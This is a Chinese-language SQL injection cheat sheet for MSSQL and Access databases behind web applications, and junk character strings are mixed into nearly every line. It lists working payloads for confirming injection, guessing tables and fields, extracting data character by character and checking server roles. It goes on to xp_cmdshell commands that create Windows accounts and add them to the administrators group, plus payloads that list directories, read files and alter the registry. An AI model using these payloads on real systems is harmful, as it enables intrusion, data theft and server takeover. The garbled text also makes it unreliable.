1.判断是否有注入;and 1=1 ;and 1=2 C,%Dp0
2.初步判断是否是mssql ;and user>0 ';}:*nZ//_
vE1:;%Q
3.注入参数是字符'and [查询条件] and ''=' {NcJL< ;tS
CEBu[TT/9
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ThkCKM
-x:7K\=$SX
5.判断数据库系统 @=2u;$.
X]n`YF7
;and (select count(*) from sysobjects)>0 mssql atW^^4:
lHPnAaue@
;and (select count(*) from msysobjects)>0 access n*i&o;5
yMzy!b Ky
i[MBO`FF
2
E?]!9T~|
6.猜数据库 ;and (select Count(*) from [数据库名])>0 s];0-65)
4sX?O4p
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 )A6=P%;}>I
kw} E0uY
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ,% 'r:@'
%Pl |3 i
9.(1)猜字段的ascii值(access) N"tX K
.3jijc j
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 LE~vSm^#
xwW(WHdC]
(2)猜字段的ascii值(mssql) 4F6I7lu
Pa#Jwo
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ic3Szd^4
VKfpk^rU
10.测试权限结构(mssql) 1<m.Q*
X\w["!B
}'86hnW
Nq^o8q_
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- WnU2.:
*_mER`
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- #T8jHnI
f3^qO9R
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- U>00B|<GJ
L_|iQwU%
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
m5a'Vs
VC_F
Cz
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- uhnnjI
XD?]+
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- xls
US'Eo
HRQfT>"/
;and 1=(select IS_MEMBER('db_owner'));-- 0v6Z4Ahpo
\zBZ$5 rE
$P)-o?eer
QFN 9j
11.添加mssql和系统的帐户 n5efHJU
{5HQ=&
;exec master.dbo.sp_addlogin username;-- UUM:*X
;exec master.dbo.sp_password null,username,password;-- m(dW["8D
;j[gE
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- (CtRU
gNZ"Kr o6
;exec master.dbo.xp_cmdshell 'net user username password '/rU<.1
Os].
IL$
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- j|qdf3^f
@3 +
;exec master.dbo.xp_cmdshell 'net user username password /add';-- a+CJJ3T-
j9w{=( MV
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ?5;wPDsK
x9t%
.QA1'_9
;9-J=@KY4
12.(1)遍历目录 oK<H/76x
Fi 7~JZZ
;create table dirs(paths varchar(100), id int) nB[B
FVkU
UF\k0oLz
;insert dirs exec master.dbo.xp_dirtree 'c:\' SOMAs'=
m(1ot M9
;and (select top 1 paths from dirs)>0 "4T36b
YACx9K H
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) !}c\u
cRCji^,KJ
uINEq{yo
R%t|R79I
(2)遍历目录 /qq*"R
mi5bk>o
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 6/p9ag]
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 P1]F0fR
n:?a=xY
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 7TU77
c=a;<,Rzb
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 (JE&1 @
;NAKU
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 e5lJ)_o
gdh|X[d
9KT85t1#
.)1u0 (?
13.mssql中的存储过程 /Tw $}8
ADP3Nic
xp_regenumvalues 注册表根键, 子键 *+2BZZwT
Z^J)]UL/
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 .lI.I
P.=Dd"La
xp_regread 根键,子键,键值名 =%u=ma;
CG J_k?h
;exec xp_regread sebuuL.l0<
nDLiER;U
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 5-'Z.[ImB?
jd"YaZOQ
xp_regwrite 根键,子键, 值名, 值类型, 值 Q&PEO%/D
UIZ9"Da
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 <~svy)Cz
#"H<k(-Cz
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Pp4Q)2X
@ kba^z
xp_regdeletevalue 根键,子键,值名 bIk4?S
bHTTxZ-%
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 X*bOE}
o?3C -A|
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 B <HD
uMZ<i}
qA25P<